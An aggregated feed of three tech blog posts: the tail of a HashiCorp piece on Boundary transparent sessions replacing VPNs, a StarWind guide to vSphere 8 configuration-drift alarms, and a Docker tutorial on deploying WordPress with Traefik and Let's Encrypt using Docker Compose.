sudo security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain ./pki_root.crt

Testing out the scenarios

1. Unauthenticated user

For the first scenario, I have logged out of Boundary and left the Client Agent running as displayed by the CLI output shown in the screenshot below. Trying to access https://test.transparentsessions.com fails as expected. Without Boundary and transparent sessions, I cannot access the website that sits in the 192.168.x.x address range within my AWS VPC in EU-West-2.


2. Unauthorized user (authenticated but unauthorized)

For the second scenario, I have authenticated into Boundary as the unauthorized user. You can see in the Desktop client that there are no targets available to connect to, and, as expected, you cannot access the website.


3. Authorized user (authenticated and authorized)

The final scenario is where an authenticated and authorized user tries to access the HTTPS target. You can see from the boundary-client-agent.log that I have successfully authenticated and that a session was created on my behalf when I connected using the alias name test.transparentsessions.com. The Boundary Client Agent has found a matching alias that is attributed to a target and starts the proxy.


I have logged into the Desktop client as the authorized user, as shown in the top right corner of the screenshot, and I have the target available. This is further confirmed by the alias details shown as our URL.


Now, in a browser, you can successfully reach the HTTPS target and see the web page. To add further credence, you can also see my AWS console showing the website-ec2 instance. If you look along that row, it only has an RFC1918 192.168.x.x address assigned and no public IPv4 address, so I have successfully reached this HTTPS target from my own home network without the need for a VPN connection.


Rethinking VPNs: How Boundary as a modern PAM takes the lead

A lot of the focus internally at HashiCorp has been on improving the Boundary user experience and making connectivity simple and secure without introducing vendor-specific CLI nuances to tried and tested workflows. This is obviously an important aspect of the feature, but the picture is bigger.

VPNs have been a mainstay in organizations for many years and still feature heavily today. The ability to create that private, encrypted tunnel comes with some potential obstacles and issues:

  1. Complexity: Setting up secure VPNs is not a trivial task. Furthermore, the overhead of managing them, if not done correctly, could potentially create security vulnerabilities within your network.
  2. Cost: The overall cost of a VPN solution can add up. Whether this is infrastructure costs, where maintaining a VPN requires investment in hardware, software, and ongoing maintenance; or for licensing, which can be expensive, especially for large organizations with many users.
  3. Security: There is always the possibility that when you are bridged onto the network through a VPN, a user can move laterally around the network, potentially seeing targets and resources that they should not have the ability to see. Yes, there are third-party tools and native capabilities with some VPNs to control this, but then that becomes yet another touchpoint that you have to set up correctly and keep up to date. Furthermore, VPNs do not manage the credentials required to securely authenticate to your desired targets.

When you compare the points above to a Boundary deployment with transparent sessions, then it’s a different narrative. From a complexity perspective, if you are using HCP Boundary then it’s a push-button deployment and HashiCorp manages the infrastructure for you. Even with self-managed Boundary deployments, you have Terraform modules to stand up the environment. But the main advantage is better security.

Boundary can be integrated with your IdP of choice, and you can control what targets/resources each authenticated user has access to from a central point, based on their role within your organization. An example I often give is that if I am a server admin, then arguably the only resources I’d need access to, to do my job, are servers. The same analogy applies to databases and DBAs.

In addition, the general onboarding and offboarding process for users in your organization is also driven via your IdP and automatically reflected in Boundary using managed groups. This all aids in reducing the operational complexity and toil within your environment.

So, are you now at a point where organizations can start to rethink their VPN strategy in favor of a Boundary deployment? Well, I touched on that in one of my previous blogs when I discussed a Boundary multi-hop worker deployment. This is where you deploy an ingress worker that is publicly addressed, as well as one or more egress workers residing within private networks. Users can then reach targets within those private networks, but without the use of a VPN. However, you couldn’t control secure access to HTTPS targets — whether that be internally hosted web pages or internally hosted SaaS applications.

With the addition of transparent sessions, you can. Organizations can now fully control access to their privately hosted SaaS targets, websites, other HTTPS targets, SSH, remote desktop, Kubernetes, database, and anything else that supports TCP. With the addition of transparent sessions, Boundary has now taken a leap forward to be positioned to remove VPNs from your environment, along with the associated risk, complexity, and cost.

Try HCP Boundary for free

To try this solution for yourself, the GitHub repo can be found here. To get started with HashiCorp’s managed Boundary service, sign up for HashiCorp Cloud Platform (HCP) Boundary, which is free for the first 5 users.



from HashiCorp Blog https://ift.tt/4SD3Zke
via IFTTT

Easily monitor vSphere 8 configuration drift with Configuration profiles and custom alarms

 

Configuration drift is a common challenge in virtualized environments, where changes to the configuration of hosts or clusters can lead to inconsistencies and potential issues. You want to be able to monitor potential configuration drift within larger VMware vSphere environments. In this blog post, we’ll explore how to set up and use vSphere 8 and Configuration profiles to ensure your environment remains compliant and stable.

Understanding Configuration Drift

Configuration drift occurs when the actual configuration of a cluster or host deviates from its desired state. This can happen due to manual changes, automated processes, or even misconfigurations. Over time, configuration drift can lead to performance issues, security vulnerabilities, and compliance problems. Monitoring and managing configuration drift is essential to maintain the health and stability of your virtualized environment.

Since vSphere 8 U1, administrators have had a feature called Configuration Profiles. We have already blogged about this feature here – vSphere 8.0 U1 Configuration Profiles, and here for v8.0 U2 – vSphere Configuration Profiles – How VMware vCenter Server 8.0 U2 Can Simplify and Optimize vSphere Infrastructure Administration.

vSphere Configuration Profiles

vSphere Configuration Profiles are a feature in VMware vSphere that allows administrators to define and enforce a desired configuration state for clusters and hosts. By creating configuration profiles, you can specify the settings and policies that should be applied to your environment. These profiles can include network settings, security policies, storage configurations, and more.

We’ll have a look at how we can easily monitor vSphere 8 configuration drift with Configuration Profiles via a custom alarm definition.

If you have drift in your vSphere configuration, you’d like to be notified, right? We can do that. You can create a custom alarm that triggers when a host (or multiple hosts) in your cluster is not compliant with the cluster configuration.

Requirements

vSphere Configuration Profiles requires the following:

  • Cluster lifecycle must be managed with vSphere Lifecycle Manager Images (vLCM).
  • Hosts must be running ESXi 8.0 or later.
  • This feature is available with Enterprise Plus license.

Limitations

There are none now, but previous releases of vSphere had some. There were limitations with vSphere Configuration Profiles and vDS (distributed vSwitches). However, since 8.0 U1, vDS is supported.

Starting with vSphere 8.0 Update 1, you can enable vSphere Configuration Profiles on a cluster that uses a vSphere Distributed Switch.

Also, there was another limitation which has been solved in U3:

Quote:

Starting with vSphere 8.0 Update 3, you can enable vSphere Configuration Profiles on a cluster that you manage with baselines. The transition workflow starts with selecting a reference host which configuration schema is imported and used as a desired cluster configuration schema.

How to create a custom alarm definition and at which level?

In vCenter Server, it depends at which level you create the new alarm (host, cluster, or datacenter).

Depending on what you want to achieve, you can also create several alarm definitions and apply them to different types of clusters (production, testing, monitoring). Then a production cluster will trigger a critical-level alarm, and a test cluster only a warning-level alarm.

Note: for now, we need to create a custom alarm, but future releases of vSphere will have a built-in alarm definition created by default.

The configuration check runs every 8 hours, which is when vSphere Configuration Profiles compares the cluster against its desired configuration. The alarm triggers on both manual and automatic compliance checks. (Yes, you can run the compliance check manually too.)

Open the vSphere Client and navigate to vCenter > Configure > Alarm Definitions > ADD.

Create new alarm and follow the assistant

Click Next and in the argument field, paste this:

com.vmware.vcIntegrity.ClusterConfigurationOutOfCompliance

Note: there are two (or more) types of alarm rule arguments:

com.vmware.vcIntegrity.HostConfigurationOutOfCompliance for host alarms or com.vmware.vcIntegrity.ClusterConfigurationOutOfCompliance for cluster alarms.


Then set the alarm to trigger and show as a warning, and enable email notification.

Click next to move on and validate the alarm creation.

Review the new alarm definition and click Create

Once done, you should see it created in the Alarm Definitions section.

New alarm should appear at the top

You can then test the alarm by changing some value within your cluster. For example, you can add a new vNIC without an uplink or create an empty vSwitch on one host, as sketched below.
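The following is a quick, throwaway way to introduce drift from the ESXi Shell or SSH on a single host; the vSwitch name is arbitrary, and you would remove it again once the alarm has fired.

# On one ESXi host: create an empty standard vSwitch that is not part of the
# cluster's desired configuration
esxcli network vswitch standard add --vswitch-name=vSwitchDriftTest

# Clean up after the compliance check has flagged the host
esxcli network vswitch standard remove --vswitch-name=vSwitchDriftTest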

Then, when you navigate to the desired state configuration of your cluster, you can check compliance and see that your host appears as non-compliant, and a new alarm should be triggered at the cluster level. You will see all hosts that differ from the config, with an alarm, in the vCenter or cluster-level Monitor tab.

Source: vSphere blog

Final Words

Monitoring configuration drift with alarms for vSphere Configuration Profiles in vSphere 8.0 U3 is a powerful way to maintain the health and stability of your virtualized environment. By setting up configuration profiles and alarms, you can ensure that your VMs and hosts remain compliant with your desired configuration state. This proactive approach helps prevent performance issues, security vulnerabilities, and compliance problems, keeping your environment running smoothly. Future versions of VMware vSphere will have this alarm built in. Hopefully configuration drift monitoring and Configuration Profiles will get even more enhancements in the future.



from StarWind Blog https://ift.tt/wXEma4r
via IFTTT

Dockerize WordPress: Simplify Your Site’s Setup and Deployment

If you’ve ever been tangled in the complexities of setting up a WordPress environment, you’re not alone. WordPress powers more than 40% of all websites, making it the world’s most popular content management system (CMS). Its versatility is unmatched, but traditional local development setups like MAMP, WAMP, or XAMPP can lead to inconsistencies and the infamous “it works on my machine” problem.

As projects scale and teams grow, the need for a consistent, scalable, and efficient development environment becomes critical. That’s where Docker comes into play, revolutionizing how we develop and deploy WordPress sites. To make things even smoother, we’ll integrate Traefik, a modern reverse proxy that automatically obtains TLS certificates, ensuring that your site runs securely over HTTPS. Traefik is available as a Docker Official Image from Docker Hub.

In this comprehensive guide, I’ll show how to Dockerize your WordPress site using real-world examples. We’ll dive into creating Dockerfiles, containerizing existing WordPress instances — including migrating your data — and setting up Traefik for automatic TLS certificates. Whether you’re starting fresh or migrating an existing site, this tutorial has you covered.

Let’s dive in!

Dockerize WordPress App

Why should you containerize your WordPress site?

Containerizing your WordPress site offers a multitude of benefits that can significantly enhance your development workflow and overall site performance.

Increased page load speed

Docker containers are lightweight and efficient. By packaging your application and its dependencies into containers, you reduce overhead and optimize resource usage. This can lead to faster page load times, improving user experience and SEO rankings.

Efficient collaboration and version control

With Docker, your entire environment is defined as code. This ensures that every team member works with the same setup, eliminating environment-related discrepancies. Version control systems like Git can track changes to your Dockerfiles and to wordpress-traefik-letsencrypt-compose.yml, making collaboration seamless.

Easy scalability

Scaling your WordPress site to handle increased traffic becomes straightforward with Docker and Traefik. You can spin up multiple Docker containers of your application, and Traefik will manage load balancing and routing, all while automatically handling TLS certificates.

Simplified environment setup

Setting up your development environment becomes as simple as running a few Docker commands. No more manual installations or configurations — everything your application needs is defined in your Docker configuration files.

Simplified updates and maintenance

Updating WordPress or its dependencies is a breeze. Update your Docker images, rebuild your containers, and you’re good to go. Traefik ensures that your routes and certificates are managed dynamically, reducing maintenance overhead.

Getting started with WordPress, Docker, and Traefik

Before we begin, let’s briefly discuss what Docker and Traefik are and how they’ll revolutionize your WordPress development workflow.

  • Docker is a cloud-native development platform that simplifies the entire software development lifecycle by enabling developers to build, share, test, and run applications in containers. It streamlines the developer experience while providing built-in security, collaboration tools, and scalable solutions to improve productivity across teams.
  • Traefik is a modern reverse proxy and load balancer designed for microservices. It integrates seamlessly with Docker and can automatically obtain and renew TLS certificates from Let’s Encrypt.

How long will this take?

Setting up this environment might take around 45-60 minutes, especially if you’re integrating Traefik for automatic TLS certificates and migrating an existing WordPress site.


Tools you’ll need

  • Docker Desktop: If you don’t already have the latest version installed, download and install Docker Desktop.
  • A domain name: Required for Traefik to obtain TLS certificates from Let’s Encrypt.
  • Access to DNS settings: To point your domain to your server’s IP address.
  • Code editor: Your preferred code editor for editing configuration files.
  • Command-line interface (CLI): Access to a terminal or command prompt.
  • Existing WordPress data: If you’re containerizing an existing site, ensure you have backups of your WordPress files and MySQL database.

What’s the WordPress Docker Bitnami image?

To simplify the process, we’ll use the Bitnami WordPress image from Docker Hub, which comes pre-packaged with a secure, optimized environment for WordPress. This reduces configuration time and ensures your setup is up to date with the latest security patches.

Using the Bitnami WordPress image streamlines your setup process by:

  • Simplifying configuration: Bitnami images come with sensible defaults and configurations that work out of the box, reducing the time spent on setup.
  • Enhancing security: The images are regularly updated to include the latest security patches, minimizing vulnerabilities.
  • Ensuring consistency: With a standardized environment, you avoid the “it works on my machine” problem and ensure consistency across development, staging, and production.
  • Including additional tools: Bitnami often includes helpful tools and scripts for backups, restores, and other maintenance tasks.

By choosing the Bitnami WordPress image, you can leverage a tested and optimized environment, reducing the risk of configuration errors and allowing you to focus more on developing your website.

Key features of Bitnami WordPress Docker image:

  • Optimized for production: Configured with performance and security in mind.
  • Regular updates: Maintained to include the latest WordPress version and dependencies.
  • Ease of use: Designed to be easy to deploy and integrate with other services, such as databases and reverse proxies.
  • Comprehensive documentation: Offers guides and support to help you get started quickly.

Why we use Bitnami in the examples:

In our Docker Compose configurations, we specified:

WORDPRESS_IMAGE_TAG=bitnami/wordpress:6.6.2

This indicates that we’re using the Bitnami WordPress image, version 6.6.2 (the same tag used in the example .env file later in this guide). The Bitnami image aligns well with our goals for a secure, efficient, and easy-to-manage WordPress environment, especially when integrating with Traefik for automatic TLS certificates.

By leveraging the Bitnami WordPress Docker image, you’re choosing a robust and reliable foundation for your WordPress projects. This approach allows you to focus on building great websites without worrying about the underlying infrastructure.

How to Dockerize an existing WordPress site with Traefik

Let’s walk through dockerizing your WordPress site using practical examples, including your .env and wordpress-traefik-letsencrypt-compose.yml configurations. We’ll also cover how to incorporate your existing data into the Docker containers.

Step 1: Preparing your environment variables

First, create a .env file in the same directory as your wordpress-traefik-letsencrypt-compose.yml file. This file will store all your environment variables.

Example .env file:

# Traefik Variables
TRAEFIK_IMAGE_TAG=traefik:2.9
TRAEFIK_LOG_LEVEL=WARN
TRAEFIK_ACME_EMAIL=your-email@example.com
TRAEFIK_HOSTNAME=traefik.yourdomain.com
# Basic Authentication for Traefik Dashboard
# Username: traefikadmin
# Passwords must be encoded using BCrypt https://hostingcanada.org/htpasswd-generator/
TRAEFIK_BASIC_AUTH=traefikadmin:$$2y$$10$$EXAMPLEENCRYPTEDPASSWORD

# WordPress Variables
WORDPRESS_MARIADB_IMAGE_TAG=mariadb:11.4
WORDPRESS_IMAGE_TAG=bitnami/wordpress:6.6.2
WORDPRESS_DB_NAME=wordpressdb
WORDPRESS_DB_USER=wordpressdbuser
WORDPRESS_DB_PASSWORD=your-db-password
WORDPRESS_DB_ADMIN_PASSWORD=your-db-admin-password
WORDPRESS_TABLE_PREFIX=wpapp_
WORDPRESS_BLOG_NAME=Your Blog Name
WORDPRESS_ADMIN_NAME=AdminFirstName
WORDPRESS_ADMIN_LASTNAME=AdminLastName
WORDPRESS_ADMIN_USERNAME=admin
WORDPRESS_ADMIN_PASSWORD=your-admin-password
WORDPRESS_ADMIN_EMAIL=admin@yourdomain.com
WORDPRESS_HOSTNAME=wordpress.yourdomain.com
WORDPRESS_SMTP_ADDRESS=smtp.your-email-provider.com
WORDPRESS_SMTP_PORT=587
WORDPRESS_SMTP_USER_NAME=your-smtp-username
WORDPRESS_SMTP_PASSWORD=your-smtp-password

Notes:

  • Replace placeholder values (e.g., your-email@example.com, your-db-password) with your actual credentials.
  • Do not commit this file to version control if it contains sensitive information.
  • Use a password encryption tool to generate the encrypted password for TRAEFIK_BASIC_AUTH. For example, you can use the htpasswd generator.
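If you prefer to generate the hash locally, the htpasswd utility (from the apache2-utils or httpd-tools package) can produce the same result. This is a minimal sketch; the sed step doubles every $ in the hash so Docker Compose does not interpret it as a variable reference:

htpasswd -nbB traefikadmin 'your-strong-password' | sed -e 's/\$/\$\$/g'
# Paste the resulting traefikadmin:$$2y$$... value into TRAEFIK_BASIC_AUTH in your .env file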

Step 2: Creating the Docker Compose file

Create a wordpress-traefik-letsencrypt-compose.yml file that defines your services, networks, and volumes. This YAML file is crucial for configuring your WordPress installation through Docker.

Example wordpress-traefik-letsencrypt-compose.yml:

networks:
  wordpress-network:
    external: true
  traefik-network:
    external: true

volumes:
  mariadb-data:
  wordpress-data:
  traefik-certificates:

services:
  mariadb:
    image: ${WORDPRESS_MARIADB_IMAGE_TAG}
    volumes:
      - mariadb-data:/var/lib/mysql
    environment:
      MARIADB_DATABASE: ${WORDPRESS_DB_NAME}
      MARIADB_USER: ${WORDPRESS_DB_USER}
      MARIADB_PASSWORD: ${WORDPRESS_DB_PASSWORD}
      MARIADB_ROOT_PASSWORD: ${WORDPRESS_DB_ADMIN_PASSWORD}
    networks:
      - wordpress-network
    healthcheck:
      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
      interval: 10s
      timeout: 5s
      retries: 3
      start_period: 60s
    restart: unless-stopped

  wordpress:
    image: ${WORDPRESS_IMAGE_TAG}
    volumes:
      - wordpress-data:/bitnami/wordpress
    environment:
      WORDPRESS_DATABASE_HOST: mariadb
      WORDPRESS_DATABASE_PORT_NUMBER: 3306
      WORDPRESS_DATABASE_NAME: ${WORDPRESS_DB_NAME}
      WORDPRESS_DATABASE_USER: ${WORDPRESS_DB_USER}
      WORDPRESS_DATABASE_PASSWORD: ${WORDPRESS_DB_PASSWORD}
      WORDPRESS_TABLE_PREFIX: ${WORDPRESS_TABLE_PREFIX}
      WORDPRESS_BLOG_NAME: ${WORDPRESS_BLOG_NAME}
      WORDPRESS_FIRST_NAME: ${WORDPRESS_ADMIN_NAME}
      WORDPRESS_LAST_NAME: ${WORDPRESS_ADMIN_LASTNAME}
      WORDPRESS_USERNAME: ${WORDPRESS_ADMIN_USERNAME}
      WORDPRESS_PASSWORD: ${WORDPRESS_ADMIN_PASSWORD}
      WORDPRESS_EMAIL: ${WORDPRESS_ADMIN_EMAIL}
      WORDPRESS_SMTP_HOST: ${WORDPRESS_SMTP_ADDRESS}
      WORDPRESS_SMTP_PORT: ${WORDPRESS_SMTP_PORT}
      WORDPRESS_SMTP_USER: ${WORDPRESS_SMTP_USER_NAME}
      WORDPRESS_SMTP_PASSWORD: ${WORDPRESS_SMTP_PASSWORD}
    networks:
      - wordpress-network
      - traefik-network
    healthcheck:
      test: timeout 10s bash -c ':> /dev/tcp/127.0.0.1/8080' || exit 1
      interval: 10s
      timeout: 5s
      retries: 3
      start_period: 90s
    labels:
      - "traefik.enable=true"
      - "traefik.http.routers.wordpress.rule=Host(`${WORDPRESS_HOSTNAME}`)"
      - "traefik.http.routers.wordpress.service=wordpress"
      - "traefik.http.routers.wordpress.entrypoints=websecure"
      - "traefik.http.services.wordpress.loadbalancer.server.port=8080"
      - "traefik.http.routers.wordpress.tls=true"
      - "traefik.http.routers.wordpress.tls.certresolver=letsencrypt"
      - "traefik.http.services.wordpress.loadbalancer.passhostheader=true"
      - "traefik.http.routers.wordpress.middlewares=compresstraefik"
      - "traefik.http.middlewares.compresstraefik.compress=true"
      - "traefik.docker.network=traefik-network"
    restart: unless-stopped
    depends_on:
      mariadb:
        condition: service_healthy
      traefik:
        condition: service_healthy

  traefik:
    image: ${TRAEFIK_IMAGE_TAG}
    command:
      - "--log.level=${TRAEFIK_LOG_LEVEL}"
      - "--accesslog=true"
      - "--api.dashboard=true"
      - "--api.insecure=true"
      - "--ping=true"
      - "--ping.entrypoint=ping"
      - "--entryPoints.ping.address=:8082"
      - "--entryPoints.web.address=:80"
      - "--entryPoints.websecure.address=:443"
      - "--providers.docker=true"
      - "--providers.docker.endpoint=unix:///var/run/docker.sock"
      - "--providers.docker.exposedByDefault=false"
      - "--certificatesresolvers.letsencrypt.acme.tlschallenge=true"
      - "--certificatesresolvers.letsencrypt.acme.email=${TRAEFIK_ACME_EMAIL}"
      - "--certificatesresolvers.letsencrypt.acme.storage=/etc/traefik/acme/acme.json"
      - "--metrics.prometheus=true"
      - "--metrics.prometheus.buckets=0.1,0.3,1.2,5.0"
      - "--global.checkNewVersion=true"
      - "--global.sendAnonymousUsage=false"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock:ro
      - traefik-certificates:/etc/traefik/acme
    networks:
      - traefik-network
    ports:
      - "80:80"
      - "443:443"
    healthcheck:
      test: ["CMD", "wget", "http://localhost:8082/ping","--spider"]
      interval: 10s
      timeout: 5s
      retries: 3
      start_period: 5s
    labels:
      - "traefik.enable=true"
      - "traefik.http.routers.dashboard.rule=Host(`${TRAEFIK_HOSTNAME}`)"
      - "traefik.http.routers.dashboard.service=api@internal"
      - "traefik.http.routers.dashboard.entrypoints=websecure"
      - "traefik.http.services.dashboard.loadbalancer.server.port=8080"
      - "traefik.http.routers.dashboard.tls=true"
      - "traefik.http.routers.dashboard.tls.certresolver=letsencrypt"
      - "traefik.http.services.dashboard.loadbalancer.passhostheader=true"
      - "traefik.http.routers.dashboard.middlewares=authtraefik"
      - "traefik.http.middlewares.authtraefik.basicauth.users=${TRAEFIK_BASIC_AUTH}"
      - "traefik.http.routers.http-catchall.rule=HostRegexp(`{host:.+}`)"
      - "traefik.http.routers.http-catchall.entrypoints=web"
      - "traefik.http.routers.http-catchall.middlewares=redirect-to-https"
      - "traefik.http.middlewares.redirect-to-https.redirectscheme.scheme=https"
    restart: unless-stopped

Notes:

  • Networks: We’re using external networks (wordpress-network and traefik-network). We’ll create these networks before deploying.
  • Volumes: Volumes are defined for data persistence.
  • Services: We’ve defined mariadb, wordpress, and traefik services with the necessary configurations.
  • Health checks: Ensure that services are healthy before dependent services start.
  • Labels: Configure Traefik routing, HTTPS settings, and enable the dashboard with basic authentication.

Step 3: Creating external networks

Before deploying your Docker Compose configuration, you need to create the external networks specified in your wordpress-traefik-letsencrypt-compose.yml.

Run the following commands to create the networks:

docker network create traefik-network
docker network create wordpress-network

Step 4: Deploying your WordPress site

Deploy your WordPress site using Docker Compose with the following command (Figure 1):

docker compose -f wordpress-traefik-letsencrypt-compose.yml -p website up -d
Screenshot of running "docker compose -f wordpress-traefik-letsencrypt-compose.yml -p website up -d" command.
Figure 1: Using Docker Compose to deploy your WordPress site.

Explanation:

  • -f wordpress-traefik-letsencrypt-compose.yml: Specifies the Docker Compose file to use.
  • -p website: Sets the project name to website.
  • up -d: Builds, (re)creates, and starts containers in detached mode.

Step 5: Verifying the deployment

Check that all services are running (Figure 2):

docker ps
Screenshot of services running, showing columns for Container ID, Image, Command, Created, Status, Ports, and Names.
Figure 2: Services running.

You should see the mariadb, wordpress, and traefik services up and running.
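You can also confirm that the health checks defined in the Compose file have passed. A quick sketch using docker inspect, assuming the website project name from Step 4 (Docker Compose v2 names containers as <project>-<service>-<index>; adjust the name if yours differs):

docker inspect --format '{{.State.Health.Status}}' website-traefik-1
# Expected output once the start period has elapsed: healthy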

Step 6: Accessing your WordPress site and Traefik dashboard

WordPress site: Navigate to https://wordpress.yourdomain.com in your browser. To reach the dashboard shown in Figure 3, open the login page (wp-login.php), enter the admin username and password you set earlier in the .env file, and click the Log In button. Your site should be served over HTTPS, with a valid TLS certificate automatically obtained by Traefik (Figure 3).

Screenshot of WordPress dashboard showing Site Health Status, At A Glance, Quick Draft, and other informational sections.
Figure 3: WordPress dashboard.

Important: For Traefik to obtain TLS certificates from Let’s Encrypt, you need to create A records in your external DNS zone that point your hostnames to the IP address of the server where Traefik runs. If you’ve just created these records, wait a bit before starting the deployment, because it can take anywhere from a few minutes to 48 hours (sometimes even longer) for the changes to fully propagate across DNS servers.
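Before starting the stack, you can verify that the records already resolve to your server. A simple check with dig, assuming the hostnames from the example .env file:

dig +short A wordpress.yourdomain.com
dig +short A traefik.yourdomain.com
# Both should return the public IP address of the server running Traefik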

  • Traefik dashboard: Access the Traefik dashboard at https://traefik.yourdomain.com. You’ll be prompted for authentication. Use the username and password specified in your .env file (Figure 4).
Screenshot of Traefik dashboard showing information on Entrypoints, Routers, Services, and Middleware.
Figure 4: Traefik dashboard.

Step 7: Incorporating your existing WordPress data

If you’re migrating an existing WordPress site, you’ll need to incorporate your existing files and database into the Docker containers.

Step 7.1: Restoring WordPress files

Copy your existing WordPress files into the wordpress-data volume.

Option 1: Using Docker volume mapping

Modify your wordpress-traefik-letsencrypt-compose.yml to map your local WordPress files directly:

volumes:
  - ./your-wordpress-files:/bitnami/wordpress

Option 2: Copying files into the running container

Assuming your WordPress backup is in ./wordpress-backup, run:

docker cp ./wordpress-backup/. website-wordpress-1:/bitnami/wordpress/
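After copying, the files may be owned by root, while the Bitnami WordPress container runs as a non-root user (UID 1001 in current Bitnami images; verify this for your tag). If WordPress cannot write to the copied files, you can adjust ownership from a root shell in the container, for example:

docker exec -u 0 website-wordpress-1 chown -R 1001:1001 /bitnami/wordpress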

Step 7.2: Importing your database

Export your existing WordPress database using mysqldump or phpMyAdmin.

Example:

mysqldump -u your_db_user -p your_db_name > wordpress_db_backup.sql

Copy the database backup into the MariaDB container:

docker cp wordpress_db_backup.sql website-mariadb-1:/wordpress_db_backup.sql

Access the MariaDB container:

docker exec -it website-mariadb-1 bash

Import the database. Inside the container, use the MARIADB_* variables that the Compose file sets in the container’s environment (the WORDPRESS_* variables from the .env file are not defined there):

mariadb -u root -p"${MARIADB_ROOT_PASSWORD}" "${MARIADB_DATABASE}" < /wordpress_db_backup.sql
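If the site’s hostname changes as part of the migration, the siteurl and home options in the database usually need to be updated as well. A minimal sketch, still inside the MariaDB container and assuming the wpapp_ table prefix from the example .env file:

mariadb -u root -p"${MARIADB_ROOT_PASSWORD}" "${MARIADB_DATABASE}" \
  -e "UPDATE wpapp_options SET option_value='https://wordpress.yourdomain.com' WHERE option_name IN ('siteurl','home');"

URLs embedded in post content are not covered by this; a tool such as WP-CLI’s search-replace command or a migration plugin can handle those more thoroughly.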

Step 7.3: Update wp-config.php (if necessary)

Because we’re using environment variables, WordPress should automatically connect to the database. However, if you have custom configurations, ensure they match the settings in your .env file.

Note: The Bitnami WordPress image manages wp-config.php automatically based on environment variables. If you need to customize it further, you can create a custom Dockerfile.

Step 8: Creating a custom Dockerfile (optional)

If you need to customize the WordPress image further, such as installing additional PHP extensions or modifying configuration files, create a Dockerfile in your project directory.

Example Dockerfile:

# Use the Bitnami WordPress image as the base
FROM bitnami/wordpress:6.6.2

# Install additional PHP extensions if needed
# RUN install_packages php7.4-zip php7.4-mbstring

# Copy custom wp-content (if not using volume mapping)
# COPY ./wp-content /bitnami/wordpress/wp-content

# Set working directory
WORKDIR /bitnami/wordpress

# Expose port 8080
EXPOSE 8080

Build the custom image:

Modify your wordpress-traefik-letsencrypt-compose.yml to build from the Dockerfile:

wordpress:
  build: .
  # Rest of the configuration

Then, rebuild your containers:

docker compose -f wordpress-traefik-letsencrypt-compose.yml -p website up -d --build

Step 9: Customizing WordPress within Docker

Adding themes and plugins

Because we’ve mapped the wordpress-data volume, any changes you make within the WordPress container (like installing plugins or themes) will persist across container restarts.

  • Via WordPress admin dashboard: Install themes and plugins as you normally would through the WordPress admin interface (Figure 5).
Screenshot of WordPress admin dashboard showing plugin choices such as Classic Editor, Akismet Anti-spam, and Jetpack.
Figure 5: Adding plugins.
  • Manually: Access the container and place your themes or plugins directly.

Example:

docker exec -it website-wordpress-1 bash
cd /bitnami/wordpress/wp-content/themes
# Add your theme files here

Managing and scaling WordPress with Docker and Traefik

Scaling your WordPress service

To handle increased traffic, you might want to scale your WordPress instances.

docker compose -f wordpress-traefik-letsencrypt-compose.yml -p website up -d --scale wordpress=3

Traefik will automatically detect the new instances and load balance traffic between them.

Note: Ensure that your WordPress setup supports scaling. You might need to externalize session storage or use a shared filesystem for media uploads.

Updating services

To update your services to the latest images:

Pull the latest images:

docker compose -f wordpress-traefik-letsencrypt-compose.yml -p website pull

Recreate containers:

docker compose -f wordpress-traefik-letsencrypt-compose.yml -p website up -d

Monitoring and logs

Docker logs:
View logs for a specific service:

docker compose -f wordpress-traefik-letsencrypt-compose.yml -p website logs -f wordpress

Traefik dashboard:
Use the Traefik dashboard to monitor routing, services, and health checks.

Optimizing your WordPress Docker setup

Implementing caching with Redis

To improve performance, you can add Redis for object caching.

Update wordpress-traefik-letsencrypt-compose.yml:

services:
  redis:
    image: redis:alpine
    networks:
      - wordpress-network
    restart: unless-stopped

Configure WordPress to use Redis:

  • Install a Redis caching plugin like Redis Object Cache.
  • Configure it to connect to the redis service.
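The Redis Object Cache plugin looks for its connection settings in wp-config.php. A minimal sketch of the constants to add above the “That’s all, stop editing!” line, assuming the redis service name from the Compose snippet above (since the Bitnami image manages wp-config.php, apply such changes via a custom Dockerfile or by editing the file inside the wordpress-data volume):

define( 'WP_REDIS_HOST', 'redis' );
define( 'WP_REDIS_PORT', 6379 );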

Security best practices

  • Secure environment variables:
    • Use Docker secrets or environment variables to manage sensitive information securely.
    • Avoid committing sensitive data to version control.
  • Restrict access to Docker socket:
    • The Docker socket is mounted read-only (:ro) to minimize security risks.
  • Keep images updated:
    • Regularly update your Docker images to include security patches and improvements.

Advanced Traefik configurations

  • Middleware: Implement middleware for rate limiting, IP whitelisting, and other request transformations (see the label sketch after this list).
  • Monitoring: Integrate with monitoring tools like Prometheus and Grafana for advanced insights.
  • Wildcard certificates: Configure Traefik to use wildcard certificates if you have multiple subdomains.
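As an illustration of the middleware point above, rate limiting can be attached to the WordPress router with a few extra labels on the wordpress service. This is a sketch using Traefik v2 label syntax; the limits are arbitrary example values, and the router’s middleware list must repeat the existing compresstraefik entry:

      - "traefik.http.middlewares.wordpress-ratelimit.ratelimit.average=100"
      - "traefik.http.middlewares.wordpress-ratelimit.ratelimit.burst=50"
      - "traefik.http.routers.wordpress.middlewares=compresstraefik,wordpress-ratelimit"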

Wrapping up

Dockerizing your WordPress site with Traefik simplifies your development and deployment processes, offering consistency, scalability, and efficiency. By leveraging practical examples and incorporating your existing data, we’ve created a tailored guide to help you set up a robust WordPress environment.

Whether you’re managing an existing site or starting a new project, this setup empowers you to focus on what you do best — developing great websites — while Docker and Traefik handle the heavy lifting.

So go ahead, give it a shot! Embracing these tools is a step toward modernizing your workflow and staying ahead in the ever-evolving tech landscape.




from Docker https://ift.tt/A7TBXWV
via IFTTT